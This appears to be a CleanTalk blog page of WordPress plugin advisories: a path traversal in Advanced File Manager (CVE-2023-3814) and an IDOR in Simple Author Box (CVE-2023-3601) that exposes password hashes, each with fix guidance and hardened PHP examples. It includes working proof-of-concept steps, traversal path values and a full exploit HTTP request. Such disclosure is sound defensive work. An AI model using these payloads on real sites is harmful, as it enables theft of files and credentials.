Category: Security issues

  • CVE-2023-3814 – Advanced File Manager < 5.1.1 - Admin+ Arbitrary File/Folder Access via Path Traversal


    A security vulnerability has been found in the Advanced File Manager WordPress plugin, affecting versions prior to 5.1.1. The plugin's "Public Root Path" setting accepts any directory, so a user who can reach the settings page (administrator or higher) can point the file manager outside the WordPress root, either directly or through path traversal, and then browse files and folders anywhere the web server's OS user can read.

    Main info:

    CVE: CVE-2023-3814
    Plugin: Advanced File Manager
    Severity: High
    Publicly Published: August 14, 2023
    Last Updated: August 14, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A5: Broken Access Control
    PoC: Yes
    Exploit: To be published later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3814
    https://wpscan.com/vulnerability/ca954ec6-6ebd-4d72-a323-570474e2e339
    Plugin Security Certification by CleanTalk

    Timeline

    July 13, 2023: Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
    July 13, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    August 9, 2023: The author has released a fix update
    August 14, 2023: Registered CVE-2023-3814

    Discovery of the Vulnerability

    During testing, it was found that the root folder the plugin reads and displays to the user can be changed to any directory on the server. Plugins of this kind normally refuse to leave the web root (for example /var/www/html), but this plugin applies no such restriction: the root can be set to an arbitrary operating-system directory such as /home, and the same result is reachable through path traversal, for example /var/www/html/../../../etc.

    Understanding Path Traversal attacks

    Path Traversal is a technique in which an attacker manipulates file paths, typically with ../ sequences or absolute paths, to reach files and directories outside the scope the application intended to expose. Exploiting it lets the attacker break out of the restricted directory and read, and sometimes write, sensitive files elsewhere on the system. OWASP lists it under Broken Access Control in the OWASP Top 10.

    Exploiting the Path Traversal vulnerability

    Exploiting this Path Traversal vulnerability in the Advanced File Manager plugin lets an attacker who already holds administrator access change the plugin's root folder, and then view, access and potentially download files from locations that the plugin is supposed to keep off-limits.

    POC:

    1. As an administrator, open the plugin settings page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_controls)

    2. In the "Public Root Path" setting, set the directory to /home, or use path traversal such as /var/www/html/../../../home or /var/www/html/wordpress/../../../../etc

    3. Open the plugin's file manager page (/wordpress/wp-admin/admin.php?page=file_manager_advanced_ui#elf_l1_Lw)

    4. The file manager now lists files and folders outside the WordPress root directory
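    The check that steps 2 to 4 above would run into, as an added example that is not code from the Advanced File Manager plugin or from its fix: a sanitize callback for a root-path option that canonicalizes the submitted path with realpath() and accepts it only if it stays inside ABSPATH. The option name fma_example_root_path, the settings group and all fma_example_* functions are assumptions made for this illustration; the plugin's actual 5.1.1 fix may be implemented differently.

```php
<?php
/**
 * Added example, not the Advanced File Manager plugin's own code: a
 * sanitize callback for a "root path" style option that refuses any value
 * resolving outside the WordPress install (ABSPATH). The option and
 * function names (fma_example_*) are assumptions for this illustration.
 */

// ABSPATH is defined by WordPress; the fallback only lets this file be
// syntax-checked outside a WordPress install.
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', '/var/www/html/wordpress/' );
}

/**
 * Canonicalize $path and return it only if it lies inside $base, else null.
 * realpath() resolves "..", symlinks and repeated slashes, so a submitted
 * "/var/www/html/wordpress/../../../etc" is compared as "/etc", and
 * "/var/www/html/wordpress2" cannot pass as a child of ".../wordpress"
 * because the base is compared with its trailing separator.
 */
function fma_example_confine_path( string $path, string $base ): ?string {
    $real_base = realpath( $base );
    $real_path = realpath( $path );
    if ( false === $real_base || false === $real_path ) {
        return null; // non-existent base or candidate: reject
    }
    $real_base = rtrim( $real_base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    if ( rtrim( $real_path, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR === $real_base ) {
        return $real_base; // the base directory itself is allowed
    }
    if ( 0 !== strncmp( $real_path, $real_base, strlen( $real_base ) ) ) {
        return null; // outside the base
    }
    return $real_path . DIRECTORY_SEPARATOR;
}

/**
 * register_setting() sanitize callback: an out-of-bounds value is rejected,
 * a settings error is shown and the previously stored value is kept.
 */
function fma_example_sanitize_root_path( $value ) {
    $current = get_option( 'fma_example_root_path', ABSPATH );
    $value   = is_string( $value ) ? trim( $value ) : '';
    if ( '' === $value ) {
        return ABSPATH;
    }
    $confined = fma_example_confine_path( $value, ABSPATH );
    if ( null === $confined ) {
        add_settings_error(
            'fma_example_root_path',
            'outside_abspath',
            'Public root path must stay inside the WordPress directory.'
        );
        return $current;
    }
    return $confined;
}

add_action( 'admin_init', function () {
    register_setting(
        'fma_example_options',
        'fma_example_root_path',
        array(
            'type'              => 'string',
            'default'           => ABSPATH,
            'sanitize_callback' => 'fma_example_sanitize_root_path',
        )
    );
} );

/**
 * Re-check at use time as well: the option may have been written before the
 * check existed or through another code path, so the stored value alone is
 * never trusted when the file manager initializes.
 */
function fma_example_effective_root(): string {
    $stored = get_option( 'fma_example_root_path', ABSPATH );
    return fma_example_confine_path( (string) $stored, ABSPATH ) ?? ABSPATH;
}
```

    A prefix comparison on the raw string would not help here: /var/www/html/wordpress/../../../etc does start with /var/www/html/wordpress/, which is why the comparison happens only after realpath() has resolved the traversal. Both PoC values, /home and the traversal forms, resolve outside ABSPATH and are rejected.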

    Potential Risks and Real-World Impact

    The Path Traversal vulnerability in the Advanced File Manager plugin introduces the following risks:

    1. Data Exposure:
      An attacker can list and potentially download files outside the web root, such as system configuration files or, on a shared host, other sites' data, exposing confidential information.
    2. Malicious Code Injection into OS folders:
      Where the file manager can also write, the attacker can modify files outside the web root, limited only by the permissions of the web server's OS user, which can compromise the site and the host it runs on.
    3. Escalation of Privileges:
      The attack requires a WordPress administrator account, so the escalation is from application-level administration to file-system access as the web server's OS user, beyond the boundary the plugin is supposed to enforce.

    Recommendations for Improved Security

    To protect your WordPress website against CVE-2023-3814 and improve overall security, consider the following measures:

    • Immediate Plugin Update:
      Upgrade to Advanced File Manager 5.1.1 or later, which fixes the root-path handling described above.
    • Input Validation:
      Developers should canonicalize any user-supplied path (resolving "..", symlinks and duplicate separators) and reject it unless it stays inside the directory the plugin is allowed to expose; checking the raw string is not enough.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Awareness:
      Educate administrators about the risks of clicking on unknown links or visiting suspicious websites, since a compromised administrator session is what this attack requires.

    By addressing the Path Traversal vulnerability within the Advanced File Manager plugin and adhering to these security recommendations, you can safeguard your WordPress website from unauthorized file and folder access, mitigating potential breaches and preserving the confidentiality of your data.

    #WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

    Use CleanTalk solutions to improve the security of your website

    Dmitrii i.

    If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.



  • CVE-2023-3601 – Simple Author Box < 2.52 - Contributor+ Arbitrary User Information Disclosure via IDOR (Thief of Creds)


    We have discovered a severe security vulnerability in the Simple Author Box plugin (CVE-2023-3601) that puts the accounts on an affected WordPress site at high risk. It allows any authenticated user with Contributor-level access or higher to retrieve arbitrary users' records, including their password hashes.

    Main info:

    CVE: CVE-2023-3601
    Plugin: Simple Author Box
    Severity: Very High
    Publicly Published: July 24, 2023
    Last Updated: July 24, 2023
    Researcher: Dmitrii Ignatyev
    OWASP TOP-10: A01:2021 Broken Access Control
    PoC: Yes
    Exploit: To be published later
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601
    https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f
    Plugin Security Certification by CleanTalk

    Timeline

    July 5, 2023: Plugin testing and vulnerability detection in the Simple Author Box plugin have been completed
    July 6, 2023: I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
    July 16, 2023: The author has eliminated the vulnerability and patched his plugin
    July 24, 2023: Registered CVE

    Discovery of the Vulnerability

    During a security assessment, I identified a critical flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601), affecting versions up to and including 2.51. It is an Insecure Direct Object Reference (IDOR): the handler for admin-ajax.php requests with action=sab_get_author takes a user ID from the request and returns that user's record without checking whether the caller is entitled to it, disclosing sensitive user details.

    Understanding Insecure Direct Object Reference (IDOR)

    Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.

    Exploiting the IDOR Vulnerability

    In the Simple Author Box handler, the plugin does not check whether the requesting user is authorized to view the requested account before returning it. By changing the author_ID parameter, an authenticated attacker with Contributor-level permissions or higher can retrieve any user's record, including the password hash (CVE-2023-3601).

    POC:

    1. Create a new Post as a Contributor user.

    2. Add the “Simple Author Box” block.

    3. Intercept the request to `/wp-admin/admin-ajax.php` upon addition of the block. Change the `author_ID` parameter to an ID of a user of your choosing.

    4. Inspect the response to see all of the information about that user, including the hashed password.

    POC request:

    POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: your_site_here
    User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://your_site_here/wordpress/wp-admin/post-new.php
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 50
    Origin: http://your_site_here
    Connection: close
    Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin

    action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7
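    The leaky pattern behind the request above, beside a hardened handler, as an added example that is not the Simple Author Box plugin's code: WordPress's WP_User object carries the raw wp_users row in its public $data property, so returning the object through wp_send_json() emits user_pass along with every other column. The action name sab_example_get_author, the nonce name and the sab_example_* functions are assumptions for this illustration; the plugin's real handler and its 2.52 fix are not reproduced here.

```php
<?php
/**
 * Added example, not the Simple Author Box plugin's code: a leaky
 * admin-ajax handler beside a hardened one. Action, nonce and function
 * names (sab_example_*) are assumptions for this illustration.
 */

/**
 * Leaky pattern. WP_User has a public $data property holding the raw row
 * from wp_users, so json_encode()/wp_send_json() of the object emits
 * user_pass, user_email, user_activation_key and more for any ID supplied,
 * and nothing here asks who is calling.
 */
function sab_example_get_author_leaky() {
    $user = get_userdata( (int) $_POST['author_ID'] );
    wp_send_json( $user ); // serializes $user->data, including user_pass
}

/**
 * Hardened handler: nonce, capability check, validated ID, an object-level
 * rule, and an explicit allow-list of fields that are already public on
 * author archive pages.
 */
function sab_example_get_author() {
    // The nonce ties the request to a page the caller loaded; it is not
    // authorization on its own (the PoC request carries a valid nonce).
    check_ajax_referer( 'sab_example_get_author', 'nonce' );

    // Only users who work in the post editor need author data here.
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    $author_id = isset( $_POST['author_ID'] ) ? absint( $_POST['author_ID'] ) : 0;
    $user      = $author_id ? get_userdata( $author_id ) : false;
    if ( ! ( $user instanceof WP_User ) ) {
        wp_send_json_error( array( 'message' => 'not found' ), 404 );
    }

    // Object-level rule: an author box only makes sense for accounts that
    // can author content, so subscriber-type accounts are not exposed at all.
    if ( ! user_can( $user, 'edit_posts' ) ) {
        wp_send_json_error( array( 'message' => 'not an author' ), 404 );
    }

    wp_send_json_success( sab_example_public_author_fields( $user ) );
}

/** Build the response from named fields; never pass the WP_User through. */
function sab_example_public_author_fields( WP_User $user ): array {
    return array(
        'ID'           => $user->ID,
        'display_name' => $user->display_name,
        'description'  => $user->description, // user meta via WP_User::__get()
        'url'          => $user->user_url,
        'avatar'       => get_avatar_url( $user->ID ),
        'posts_url'    => get_author_posts_url( $user->ID ),
    );
}

add_action( 'wp_ajax_sab_example_get_author', 'sab_example_get_author' );
```

    The allow-list is the control that matters most: even with the nonce and capability checks in place, a handler that echoes the whole object still hands a password hash to every Contributor. Hashes should never leave the server, whatever the caller's role.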

    Potential Risks and Real-World Impact

    The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. Some of the potential real-world impact includes:

    1. Unauthorized Data Exposure:
      Attackers can view and collect sensitive user information, leading to privacy violations and potential misuse of user data.
    2. Credential Compromise:
      Disclosure of hashed passwords can enable attackers to launch offline attacks, attempting to crack passwords and potentially gain unauthorized access to user accounts.
    3. Identity Impersonation:
      The leaked information could facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially affecting the reputation of the website.

    Recommendations for Improved Security

    To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:

    • Immediate Plugin Update:
      Update to Simple Author Box 2.52 or later, which fixes the IDOR in the sab_get_author handler. Sites still running 2.51 or earlier remain exploitable by any Contributor-level account.
    • Security Best Practices:
      Plugin developers should adhere to secure coding practices, including input validation, proper access controls, and sanitization of user data.
    • Regular Security Audits:
      Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
    • User Privilege Restriction:
      Implement strict access controls to ensure that users can only access information that they are authorized to view based on their roles and permissions.
    • User Awareness:
      Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords.

    By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.


    Dmitrii ignatyev




  • Security vulnerability in Anti-Spam by CleanTalk for WordPress prior 6.11


    We have fixed a security vulnerability in Anti-Spam by CleanTalk for WordPress. The vulnerability can still be exploited in plugin versions prior to 6.11. You can see the changelog here.

    You can check the current version of the plugin in the list of your installed plugins.

    WordPress Console -> Plugins

    If you are running one of the affected versions, update the plugin to the latest stable version as soon as you read this post, following our update guide.